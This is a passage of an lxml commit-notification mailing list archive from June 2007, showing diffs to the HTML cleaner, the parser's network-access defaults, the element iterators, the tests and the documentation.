clean(), but takes a text input document, and returns a text @@ -165,6 +171,8 @@ el.tag = 'img' kill_tags = set() remove_tags = set(remove_tags or ()) + if allow_tags: + allow_tags = set(allow_tags) if scripts: kill_tags.add('script') if safe_attrs_only: @@ -186,7 +194,7 @@ if not style: # If we're deleting style then we don't have to remove JS links # from styles, otherwise... - for el in doc.xpath('descendant-or-self::*[@style]'): + for el in _find_styled_elements(doc): old = el.get('style') new = _css_javascript_re.sub('', old) new = _css_import_re.sub('', old) @@ -195,7 +203,7 @@ del el.attrib['style'] elif new != old: el.set('style', new) - for el in doc.xpath('descendant-or-self::style'): + for el in list(doc.getiterator('style')): if el.get('type', '').lower().strip() == 'text/javascript': el.drop_element() continue @@ -222,10 +230,10 @@ # del el.attrib['xmlns'] if style: kill_tags.add('style') - for el in doc.xpath('descendant-or-self::link'): - if 'stylesheet' in el.attrib.get('rel', '').lower(): + for el in doc.getiterator('link'): + if 'stylesheet' in el.get('rel', '').lower(): el.drop_element() - for el in doc.xpath('descendant-or-self::*[@style]'): + for el in _find_styled_elements(doc): del el.attrib['style'] if links: kill_tags.add('link') @@ -288,25 +296,21 @@ if allow_tags: raise ValueError( "It does not make sense to pass in both allow_tags and remove_unknown_tags") - allow_tags = defs.tags + allow_tags = set(defs.tags) if allow_tags: bad = [] for el in doc.getiterator(): if el.tag not in allow_tags: bad.append(el) - for el in bad: - if strip_tags: + if strip_tags: + for el in bad: el.drop_tag() - else: - # FIXME: Should we test if this has been removed because of a parent? 
+ else: + for el in bad: el.drop_element() if add_nofollow: - for el in doc.xpath('descendant-or-self::a[@href]'): - href = el.attrib['href'] - if not href or href.startswith('#'): - # internal link, we don't care - continue - el.attrib['rel'] = 'nofollow' + for el in _find_external_links(doc): + el.set('rel', 'nofollow') def _remove_javascript(link): # links like "j a v a s c r i p t:" might be interpreted in IE From ianb at codespeak.net Thu Jun 7 18:56:07 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Thu, 7 Jun 2007 18:56:07 +0200 (CEST) Subject: [Lxml-checkins] r44100 - lxml/branch/html/src/lxml/html Message-ID: <20070607165607.0ED2B80E5@code0.codespeak.net> Author: ianb Date: Thu Jun 7 18:56:06 2007 New Revision: 44100 Modified: lxml/branch/html/src/lxml/html/clean.py Log: improve autolink_html a bit; add some comments and doc stuff Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 18:56:06 2007 @@ -45,6 +45,7 @@ _whitespace_re = re.compile(r'\s+') # FIXME: should data: be blocked? +# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx _conditional_comment_re = re.compile( r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S) @@ -440,9 +441,19 @@ return leading_text, links def autolink_html(html, *args, **kw): - doc = parse(html) + if isinstance(html, basestring): + doc = parse(html) + return_string = True + else: + doc = copy.deepcopy(html) + return_string = False autolink(doc, *args, **kw) - return tostring(doc) + if return_string: + return tostring(doc) + else: + return doc + +autolink_html.__doc__ = autolink.__doc__ _avoid_word_break_elements = ['pre', 'textarea', 'code'] _avoid_word_break_classes = ['nobreak'] @@ -455,7 +466,7 @@ Breaks any long words found in the body of the text (not attributes). 
Doesn't effect any of the tags in avoid_elements, by default - textarea and pre + ``<textarea>`` and ``<pre>`` Breaks words by inserting ​, which is a unicode character for Zero Width Space character. This generally takes up no space @@ -524,9 +535,20 @@ _decomment_re = re.compile(r'/\*.*?\*/', re.S) def _has_sneaky_javascript(style): + """ + Depending on the browser, stuff like ``e x p r e s s i o n(...)`` + can get interpreted, or ``expre/* stuff */ssion(...)``. This + checks for attempt to do stuff like this. + + Typically the response will be to kill the entire style; if you + have just a bit of Javascript in the style another rule will catch + that and remove only the Javascript from the style; this catches + more sneaky attempts. + """ style = _decomment_re.sub('', style) style = style.replace('\\', '') style = _whitespace_re.sub('', style) + style = style.lower() if 'javascript:' in style: return True if 'expression(' in style: From ianb at codespeak.net Thu Jun 7 19:35:38 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Thu, 7 Jun 2007 19:35:38 +0200 (CEST) Subject: [Lxml-checkins] r44104 - in lxml/branch/html: . doc src/lxml src/lxml/tests Message-ID: <20070607173538.92E1980C0@code0.codespeak.net> Author: ianb Date: Thu Jun 7 19:35:37 2007 New Revision: 44104 Modified: lxml/branch/html/TODO.txt lxml/branch/html/doc/FAQ.txt lxml/branch/html/doc/build.txt lxml/branch/html/doc/tutorial.txt lxml/branch/html/src/lxml/builder.py lxml/branch/html/src/lxml/parser.pxi lxml/branch/html/src/lxml/tests/test_etree.py lxml/branch/html/src/lxml/tests/test_xslt.py Log: svn merge -r43854:HEAD http://codespeak.net/svn/lxml/trunk Modified: lxml/branch/html/TODO.txt ============================================================================== --- lxml/branch/html/TODO.txt (original) +++ lxml/branch/html/TODO.txt Thu Jun 7 19:35:37 2007 @@ -58,6 +58,10 @@ * clean up (and remove?) 
duplicated API for extension functions +* allow (and prefer) Namespace classes local to a parser + +* remove first 'context' argument from extension functions + * find a way to integrate Schematron (if it's available) * always use ns-prefixed type names in objectify's ``xsi:type`` attributes @@ -68,3 +72,9 @@ * follow PEP 8 in API naming (avoidCamelCase in_favour_of_underscores) * clean support for entities (maybe an Entity element class?) + + +Changes in 2.0 +-------------- + +* network access in parsers disabled by default Modified: lxml/branch/html/doc/FAQ.txt ============================================================================== --- lxml/branch/html/doc/FAQ.txt (original) +++ lxml/branch/html/doc/FAQ.txt Thu Jun 7 19:35:37 2007 @@ -258,7 +258,12 @@ b) If you are using threads, please see the following section to check if you touch on one of the potential pitfalls. -c) Otherwise, we would really like to hear about it. Please report it to the +c) Try to reproduce the problem with the latest versions of libxml2 and + libxslt. From time to time, bugs and race conditions are found in these + libraries, so a more recent version might already contain a fix for your + problem. + +d) Otherwise, we would really like to hear about it. Please report it to the `mailing list`_ so that we can fix it. It is very helpful in this case if you can come up with a short code snippet that demonstrates your problem. Please also report the version of lxml, libxml2 and libxslt that you are Modified: lxml/branch/html/doc/build.txt ============================================================================== --- lxml/branch/html/doc/build.txt (original) +++ lxml/branch/html/doc/build.txt Thu Jun 7 19:35:37 2007 @@ -44,7 +44,7 @@ http://codespeak.net/svn/lxml/pyrex/ A subversion checkout of lxml will automatically retrieve the latest Pyrex - as external project source (``svn:externals``). Look out for the ``Pyrex`` + as external project source (``svn:externals``). 
Look for the ``Pyrex`` directory in the source tree. Since version 1.1.2, the lxml source distribution also includes this Pyrex @@ -182,6 +182,26 @@ lxml maintainer. +Providing newer library versions on Mac-OS X +-------------------------------------------- + +The Unix environment in Mac-OS X makes it relatively easy to install +Unix/Linux style package management tools and new software. However, it seems +to be hard to get libraries set up for exclusive usage that Mac-OS X ships in +an older version. The result can be segfaults on this platform that are hard +to track down. + +To make sure the newer libxml2 and libxslt versions are used (e.g. under +fink), you should add the directory where you installed the libraries to the +``DYLD_LIBRARY_PATH`` environment variable. This seems to fix a lot of +problems for users. + +Alternatively, you can build lxml statically. A way to do this on MS Windows +is described in the next section, but it should be easy to adapt it for +Mac-OS. That way, you can always be sure you use the versions you compiled +lxml with, regardless of the runtime environement. + + Static linking on Windows ------------------------- Modified: lxml/branch/html/doc/tutorial.txt ============================================================================== --- lxml/branch/html/doc/tutorial.txt (original) +++ lxml/branch/html/doc/tutorial.txt Thu Jun 7 19:35:37 2007 @@ -329,11 +329,11 @@ .. _`further iterators`: api.html#iteration - - The ElementTree class ===================== +An ``ElementTree`` is mainly a wrapper around a tree with a root node. 
+ Parsing files and XML literals ============================== Modified: lxml/branch/html/src/lxml/builder.py ============================================================================== --- lxml/branch/html/src/lxml/builder.py (original) +++ lxml/branch/html/src/lxml/builder.py Thu Jun 7 19:35:37 2007 @@ -16,9 +16,6 @@ return lambda *args, **kwargs: func(tag, *args, **kwargs) -class _C: - pass - class ElementMaker(object): """Element generator factory. @@ -97,7 +94,12 @@ </html> """ - def __init__(self, typemap=None): + def __init__(self, typemap=None, parser=None): + if parser is not None: + self._makeelement = parser.makeelement + else: + self._makeelement = ET.Element + # initialize type map for this element factory if typemap: @@ -121,20 +123,12 @@ attrib[k] = typemap[type(v)](None, v) typemap[dict] = add_dict - def add_elem(elem, item): - elem.append(item) - t = type(ET.Element("tag")) - if t is not type(_C()): - typemap[t] = add_elem - self._typemap = typemap - # print typemap - def __call__(self, tag, *children, **attrib): get = self._typemap.get - elem = ET.Element(tag) + elem = self._makeelement(tag) if attrib: get(dict)(elem, attrib) Modified: lxml/branch/html/src/lxml/parser.pxi ============================================================================== --- lxml/branch/html/src/lxml/parser.pxi (original) +++ lxml/branch/html/src/lxml/parser.pxi Thu Jun 7 19:35:37 2007 @@ -665,8 +665,9 @@ cdef int _XML_DEFAULT_PARSE_OPTIONS _XML_DEFAULT_PARSE_OPTIONS = ( - xmlparser.XML_PARSE_NOENT | + xmlparser.XML_PARSE_NOENT | xmlparser.XML_PARSE_NOCDATA | + xmlparser.XML_PARSE_NONET | xmlparser.XML_PARSE_COMPACT ) @@ -685,19 +686,19 @@ * attribute_defaults - read default attributes from DTD * dtd_validation - validate (if DTD is available) * load_dtd - use DTD for parsing - * no_network - prevent network access + * no_network - prevent network access (default: True) * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through 
broken XML * remove_blank_text - discard blank text nodes - * compact - safe memory for short text content (default: on) - * resolve_entities - replace entities by their text value (default: on) + * compact - safe memory for short text content (default: True) + * resolve_entities - replace entities by their text value (default: True) Note that you should avoid sharing parsers between threads. While this is not harmful, it is more efficient to use separate parsers. This does not apply to the default parser. """ def __init__(self, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, ns_clean=False, + load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, resolve_entities=True): cdef int parse_options @@ -712,14 +713,14 @@ if attribute_defaults: parse_options = parse_options | xmlparser.XML_PARSE_DTDATTR | \ xmlparser.XML_PARSE_DTDLOAD - if no_network: - parse_options = parse_options | xmlparser.XML_PARSE_NONET if ns_clean: parse_options = parse_options | xmlparser.XML_PARSE_NSCLEAN if recover: parse_options = parse_options | xmlparser.XML_PARSE_RECOVER if remove_blank_text: parse_options = parse_options | xmlparser.XML_PARSE_NOBLANKS + if not no_network: + parse_options = parse_options ^ xmlparser.XML_PARSE_NONET if not compact: parse_options = parse_options ^ xmlparser.XML_PARSE_COMPACT if not resolve_entities: @@ -777,7 +778,15 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(_BaseParser parser=None): +def setDefaultParser(parser): + "Deprecated, please use set_default_parser instead." + set_default_parser(parser) + +def getDefaultParser(): + "Deprecated, please use get_default_parser instead." + return get_default_parser() + +def set_default_parser(_BaseParser parser=None): """Set a default parser for the current thread. This parser is used globally whenever no parser is supplied to the various parse functions of the lxml API. 
If this function is called without a parser (or if it is @@ -791,24 +800,19 @@ parser = __DEFAULT_XML_PARSER __GLOBAL_PARSER_CONTEXT.setDefaultParser(parser) -def getDefaultParser(): - return __GLOBAL_PARSER_CONTEXT.getDefaultParser() - -def set_default_parser(parser): - "Deprecated, please use setDefaultParser instead." - setDefaultParser(parser) - def get_default_parser(): - "Deprecated, please use getDefaultParser instead." - return getDefaultParser() + return __GLOBAL_PARSER_CONTEXT.getDefaultParser() ############################################################ ## HTML parser ############################################################ cdef int _HTML_DEFAULT_PARSE_OPTIONS -_HTML_DEFAULT_PARSE_OPTIONS = \ +_HTML_DEFAULT_PARSE_OPTIONS = ( + htmlparser.HTML_PARSE_RECOVER | + htmlparser.HTML_PARSE_NONET | htmlparser.HTML_PARSE_COMPACT + ) cdef class HTMLParser(_BaseParser): """The HTML parser. This parser allows reading HTML into a normal XML @@ -817,25 +821,25 @@ Available boolean keyword arguments: * recover - try hard to parse through broken HTML (default: True) - * no_network - prevent network access + * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes - * compact - safe memory for short text content (default: on) + * compact - safe memory for short text content (default: True) - Note that you should avoid sharing parsers between threads for parformance + Note that you should avoid sharing parsers between threads for performance reasons. 
""" - def __init__(self, recover=True, no_network=False, remove_blank_text=False, + def __init__(self, recover=True, no_network=True, remove_blank_text=False, compact=True): cdef int parse_options _BaseParser.__init__(self) parse_options = _HTML_DEFAULT_PARSE_OPTIONS - if recover: - parse_options = parse_options | htmlparser.HTML_PARSE_RECOVER - if no_network: - parse_options = parse_options | htmlparser.HTML_PARSE_NONET if remove_blank_text: parse_options = parse_options | htmlparser.HTML_PARSE_NOBLANKS + if not recover: + parse_options = parse_options ^ htmlparser.HTML_PARSE_RECOVER + if not no_network: + parse_options = parse_options ^ htmlparser.HTML_PARSE_NONET if not compact: parse_options = parse_options ^ htmlparser.HTML_PARSE_COMPACT Modified: lxml/branch/html/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_etree.py (original) +++ lxml/branch/html/src/lxml/tests/test_etree.py Thu Jun 7 19:35:37 2007 @@ -390,22 +390,23 @@ xml = u'<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' self.assertRaises(_LocalException, parse, StringIO(xml), parser) - def test_entity(self): - parse = self.etree.parse - tostring = self.etree.tostring - parser = self.etree.XMLParser(resolve_entities=False) - Entity = self.etree.Entity + if etree.LIBXML_VERSION > (2,6,20): + def test_entity_parse(self): + parse = self.etree.parse + tostring = self.etree.tostring + parser = self.etree.XMLParser(resolve_entities=False) + Entity = self.etree.Entity + + xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' + tree = parse(StringIO(xml), parser) + root = tree.getroot() + self.assertEquals(root[0].tag, Entity) + self.assertFalse(root[0].text) + self.assertEquals(root[0].tail, None) + self.assertEquals(root[0].name, "myentity") - xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' - tree = parse(StringIO(xml), parser) - root = tree.getroot() - self.assertEquals(root[0].tag, Entity) 
- self.assertFalse(root[0].text) - self.assertEquals(root[0].tail, None) - self.assertEquals(root[0].name, "myentity") - - self.assertEquals('<doc>&myentity;</doc>', - tostring(root)) + self.assertEquals('<doc>&myentity;</doc>', + tostring(root)) def test_entity_append(self): Entity = self.etree.Entity Modified: lxml/branch/html/src/lxml/tests/test_xslt.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_xslt.py (original) +++ lxml/branch/html/src/lxml/tests/test_xslt.py Thu Jun 7 19:35:37 2007 @@ -37,19 +37,18 @@ def test_xslt_input_none(self): self.assertRaises(TypeError, etree.XSLT, None) - def test_xslt_invalid_stylesheet(self): - if etree.LIBXSLT_VERSION < (1,1,15): - return # no error from libxslt? - - style = self.parse('''\ + if False and etree.LIBXSLT_VERSION >= (1,1,15): + # earlier versions generate no error + if etree.LIBXSLT_VERSION > (1,1,17): + def test_xslt_invalid_stylesheet(self): + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:template match="/"> - <xsl:template /> - </xsl:template> + <xsl:stylesheet /> </xsl:stylesheet>''') - self.assertRaises(etree.XSLTParseError, etree.XSLT, style) + self.assertRaises( + etree.XSLTParseError, etree.XSLT, style) def test_xslt_utf8(self): tree = self.parse(u'<a><b>\uF8D2</b><c>\uF8D2</c></a>') @@ -242,13 +241,12 @@ ''', st.tostring(res)) - def test_xslt_parameter_missing(self): - # DISABLED - NOT RELIABLE! - if etree.LIBXSLT_VERSION >= (1,1,18): - return # no error from libxslt? 
- # apply() without needed parameter will lead to XSLTApplyError - tree = self.parse('<a><b>B</b><c>C</c></a>') - style = self.parse('''\ + if etree.LIBXSLT_VERSION < (1,1,18): + # later versions produce no error + def test_xslt_parameter_missing(self): + # apply() without needed parameter will lead to XSLTApplyError + tree = self.parse('<a><b>B</b><c>C</c></a>') + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> @@ -256,9 +254,9 @@ </xsl:template> </xsl:stylesheet>''') - st = etree.XSLT(style) - self.assertRaises(etree.XSLTApplyError, - st.apply, tree) + st = etree.XSLT(style) + self.assertRaises(etree.XSLTApplyError, + st.apply, tree) def test_xslt_multiple_parameters(self): tree = self.parse('<a><b>B</b><c>C</c></a>') From scoder at codespeak.net Thu Jun 7 20:48:20 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 20:48:20 +0200 (CEST) Subject: [Lxml-checkins] r44106 - lxml/branch/html/src/lxml/html Message-ID: <20070607184820.95BC5808F@code0.codespeak.net> Author: scoder Date: Thu Jun 7 20:48:20 2007 New Revision: 44106 Modified: lxml/branch/html/src/lxml/html/clean.py Log: getiterator() instead of .xpath() Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 20:48:20 2007 @@ -168,7 +168,7 @@ el.drop_element() # First, handle a case that IE treats <image> like <img>, and that can # confuse either this step or later steps. 
- for el in doc.xpath('descendant-or-self::image'): + for el in doc.getiterator('image'): el.tag = 'img' kill_tags = set() remove_tags = set(remove_tags or ()) From scoder at codespeak.net Sat Jun 9 10:05:32 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 10:05:32 +0200 (CEST) Subject: [Lxml-checkins] r44110 - lxml/branch/html/src/lxml Message-ID: <20070609080532.9263E80CB@code0.codespeak.net> Author: scoder Date: Sat Jun 9 10:05:31 2007 New Revision: 44110 Modified: lxml/branch/html/src/lxml/parser.pxi Log: missing default kw arg Modified: lxml/branch/html/src/lxml/parser.pxi ============================================================================== --- lxml/branch/html/src/lxml/parser.pxi (original) +++ lxml/branch/html/src/lxml/parser.pxi Sat Jun 9 10:05:31 2007 @@ -778,7 +778,7 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(parser): +def setDefaultParser(parser=None): "Deprecated, please use set_default_parser instead." set_default_parser(parser) From scoder at codespeak.net Sat Jun 9 10:06:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 10:06:40 +0200 (CEST) Subject: [Lxml-checkins] r44111 - in lxml/branch/html: . 
src/lxml src/lxml/html src/lxml/tests Message-ID: <20070609080640.DE8A880CB@code0.codespeak.net> Author: scoder Date: Sat Jun 9 10:06:40 2007 New Revision: 44111 Modified: lxml/branch/html/CHANGES.txt lxml/branch/html/src/lxml/apihelpers.pxi lxml/branch/html/src/lxml/etree.pyx lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/tests/test_elementtree.py lxml/branch/html/src/lxml/tests/test_etree.py Log: support for Comment, PI and Entity in getiterator(tag) Modified: lxml/branch/html/CHANGES.txt ============================================================================== --- lxml/branch/html/CHANGES.txt (original) +++ lxml/branch/html/CHANGES.txt Sat Jun 9 10:06:40 2007 @@ -50,6 +50,9 @@ Bugs fixed ---------- +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath Modified: lxml/branch/html/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/html/src/lxml/apihelpers.pxi (original) +++ lxml/branch/html/src/lxml/apihelpers.pxi Sat Jun 9 10:06:40 2007 @@ -459,6 +459,9 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node.type != tree.XML_ELEMENT_NODE: + # not an element, only succeed if we match everything + return c_name is NULL and c_href is NULL if c_name is NULL: if c_href is NULL: # always match Modified: lxml/branch/html/src/lxml/etree.pyx ============================================================================== --- lxml/branch/html/src/lxml/etree.pyx (original) +++ lxml/branch/html/src/lxml/etree.pyx Sat Jun 9 10:06:40 2007 @@ -1631,17 +1631,24 @@ cdef public class _ElementTagMatcher [ object LxmlElementTagMatcher, type LxmlElementTagMatcherType ]: cdef object _pystrings + cdef int _node_type cdef char* _href cdef char* _name cdef _initTagMatch(self, tag): + self._href = 
NULL + self._name = NULL if tag is None: - self._href = NULL - self._name = NULL + self._node_type = 0 + elif tag is Comment: + self._node_type = tree.XML_COMMENT_NODE + elif tag is ProcessingInstruction: + self._node_type = tree.XML_PI_NODE + elif tag is Entity: + self._node_type = tree.XML_ENTITY_REF_NODE else: + self._node_type = tree.XML_ELEMENT_NODE self._pystrings = _getNsTag(tag) - if self._pystrings[0] is None: - self._href = NULL - else: + if self._pystrings[0] is not None: self._href = _cstr(self._pystrings[0]) self._name = _cstr(self._pystrings[1]) if self._name[0] == c'*' and self._name[1] == c'\0': @@ -1659,7 +1666,9 @@ cdef xmlNode* c_node c_node = self._next_element(node._c_node) while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is NULL: self._node = None @@ -1690,7 +1699,9 @@ self._next_element = _nextElement if tag is not None: while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is not NULL: # store Python ref: @@ -1736,14 +1747,15 @@ # keep next node to return and a depth counter in the tree cdef _Element _next_node cdef _Element _top_node - cdef int _include_all_types def __init__(self, _Element node not None, tag=None, inclusive=True): self._top_node = node self._next_node = node self._initTagMatch(tag) - if tag is not None and \ - not _tagMatches(node._c_node, self._href, self._name) or \ - not inclusive: + if not inclusive or \ + tag is not None and \ + self._node_type != 0 and \ + (self._node_type != node._c_node.type or + not _tagMatches(node._c_node, self._href, self._name)): # this cannot raise StopIteration, self._next_node != None self.next() @@ -1769,7 
+1781,8 @@ cdef xmlNode* _nextNodeAnyTag(self, xmlNode* c_node): tree.BEGIN_FOR_EACH_ELEMENT_FROM(self._top_node._c_node, c_node, 0) - return c_node + if self._node_type == 0 or self._node_type == c_node.type: + return c_node tree.END_FOR_EACH_ELEMENT_FROM(c_node) return NULL Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sat Jun 9 10:06:40 2007 @@ -160,9 +160,8 @@ # comments that could be conditional if not comments: bad = [] - for el in doc.getiterator(): - if (isinstance(el, etree.CommentBase) - and _conditional_comment_re.search(el.text)): + for el in doc.getiterator(etree.Comment): + if _conditional_comment_re.search(el.text): bad.append(el) for el in bad: el.drop_element() Modified: lxml/branch/html/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/html/src/lxml/tests/test_elementtree.py Sat Jun 9 10:06:40 2007 @@ -1419,6 +1419,56 @@ [a2], list(c.getiterator('a'))) + def test_getiterator_filter_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + comment_b = Comment("TEST-b") + b.append(comment_b) + + self.assertEquals( + [comment_b], + list(a.getiterator(Comment))) + + comment_a = Comment("TEST-a") + a.append(comment_a) + + self.assertEquals( + [comment_b, comment_a], + list(a.getiterator(Comment))) + + self.assertEquals( + [comment_b], + list(b.getiterator(Comment))) + + def test_getiterator_filter_pi(self): + Element = self.etree.Element + PI = self.etree.ProcessingInstruction + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + pi_b = PI("TEST-b") + b.append(pi_b) + + self.assertEquals( + 
[pi_b], + list(a.getiterator(PI))) + + pi_a = PI("TEST-a") + a.append(pi_a) + + self.assertEquals( + [pi_b, pi_a], + list(a.getiterator(PI))) + + self.assertEquals( + [pi_b], + list(b.getiterator(PI))) + def test_getiterator_with_text(self): Element = self.etree.Element SubElement = self.etree.SubElement Modified: lxml/branch/html/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_etree.py (original) +++ lxml/branch/html/src/lxml/tests/test_etree.py Sat Jun 9 10:06:40 2007 @@ -1229,6 +1229,31 @@ [d, f], list(a.getiterator('{b}*'))) + def test_getiterator_filter_entities(self): + Element = self.etree.Element + Entity = self.etree.Entity + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + entity_b = Entity("TEST-b") + b.append(entity_b) + + self.assertEquals( + [entity_b], + list(a.getiterator(Entity))) + + entity_a = Entity("TEST-a") + a.append(entity_a) + + self.assertEquals( + [entity_b, entity_a], + list(a.getiterator(Entity))) + + self.assertEquals( + [entity_b], + list(b.getiterator(Entity))) + def test_findall_ns(self): XML = self.etree.XML root = XML('<a xmlns:x="X" xmlns:y="Y"><x:b><c/></x:b><b/><c><x:b/><b/></c><b/></a>') From scoder at codespeak.net Sat Jun 9 16:44:53 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 16:44:53 +0200 (CEST) Subject: [Lxml-checkins] r44115 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070609144453.3F0E380BC@code0.codespeak.net> Author: scoder Date: Sat Jun 9 16:44:51 2007 New Revision: 44115 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/diff.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: renamed drop_tag to drop_element and drop_element to drop_tree, some more cleanup Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Sat Jun 9 16:44:51 2007 @@ -11,31 +11,31 @@ _rel_links_xpath = etree.XPath("descendant-or-self::a[@rel]") #_class_xpath = etree.XPath(r"descendant-or-self::*[regexp:match(@class, concat('\b', $class_name, '\b'))]", {'regexp': 'http://exslt.org/regular-expressions'}) -_class_xpath = etree.XPath("descendant-or-self::*[contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") +_class_xpath = etree.XPath("descendant-or-self::*[@class and contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") _id_xpath = etree.XPath("descendant-or-self::*[@id=$id]") +_collect_string_content = etree.XPath("string()") _css_url_re = re.compile(r'url\((.*?)\)', re.I) _css_import_re = re.compile(r'@import "(.*?)"') class HtmlMixin(object): - def drop_element(self): + def drop_tree(self): """ Removes this element from the tree, including its children and text. The tail text is joined to the previous element or parent. 
""" parent = self.getparent() - assert parent - index = parent.index(self) + assert parent is not None if self.tail: - if index == 0: + previous = self.getprevious() + if previous is None: parent.text = (parent.text or '') + self.tail else: - previous = parent[index-1] previous.tail = (previous.tail or '') + self.tail parent.remove(self) - def drop_tag(self): + def drop_element(self): """ Remove the tag, but not its children or text. The children and text are merged into the parent. @@ -43,29 +43,28 @@ Example:: >>> h = parse_element('<div>Hello <b>World!</b></div>') - >>> h.xpath('//b')[0].drop_tag() + >>> h.find('//b').drop_element() >>> print tostring(h) <div>Hello World!</div> """ parent = self.getparent() - assert parent - index = parent.index(self) + assert parent is not None + previous = self.getprevious() if self.text: - if index == 0: + if previous is None: parent.text = (parent.text or '') + self.text else: - prev = parent[index-1] - prev.tail = (prev.tail or '') + self.text + previous.tail = (previous.tail or '') + self.text if self.tail: if len(self): last = self[-1] last.tail = (last.tail or '') + self.tail - elif index == 0: + elif previous is None: parent.text = (parent.text or '') + self.tail else: - prev = parent[index-1] - prev.tail = (prev.tail or '') + self.tail - parent[index:index+1] = list(self) + previous.tail = (previous.tail or '') + self.tail + index = parent.index(self) + parent[index:index+1] = self[:] def find_rel_links(self, rel): """ @@ -73,7 +72,7 @@ """ rel = rel.lower() return [el for el in _rel_links_xpath(self) - if el.attrib['rel'].lower() == rel] + if el.get('rel').lower() == rel] def find_class(self, class_name): """ @@ -103,7 +102,7 @@ """ Return the text content of the tag (and the text in any children). 
""" - return self.xpath("string()") + return _collect_string_content(self) ######################################## ## Link functions @@ -134,8 +133,8 @@ base_href = None basetags = self.xpath('//base[@href]') for b in basetags: - base_href = b.attrib['href'] - b.drop_element() + base_href = b.get('href') + b.drop_tree() if not base_href: return self.make_links_absolute(base_href, resolve_base_href=False) @@ -370,7 +369,7 @@ body.extend(other_body) # We'll ignore tail # I guess we are ignoring attributes too - other_body.drop_element() + other_body.drop_tree() else: body = None heads = doc.findall('head') @@ -381,7 +380,7 @@ for other_head in heads[1:]: head.extend(other_head) # We don't care about text or tail in a head - other_head.drop_element() + other_head.drop_tree() return doc if (len(body) == 1 and (not body.text or not body.text.strip()) and (not body[-1].tail or not body[-1].tail.strip())): Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sat Jun 9 16:44:51 2007 @@ -53,7 +53,7 @@ "descendant-or-self::*[@style]") _find_external_links = etree.XPath( - "descendant-or-self::a[string(@href) and substring(@href,0,1) != '#']") + "descendant-or-self::a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']") def clean_html(html, **kw): """ @@ -164,7 +164,7 @@ if _conditional_comment_re.search(el.text): bad.append(el) for el in bad: - el.drop_element() + el.drop_tree() # First, handle a case that IE treats <image> like <img>, and that can # confuse either this step or later steps. 
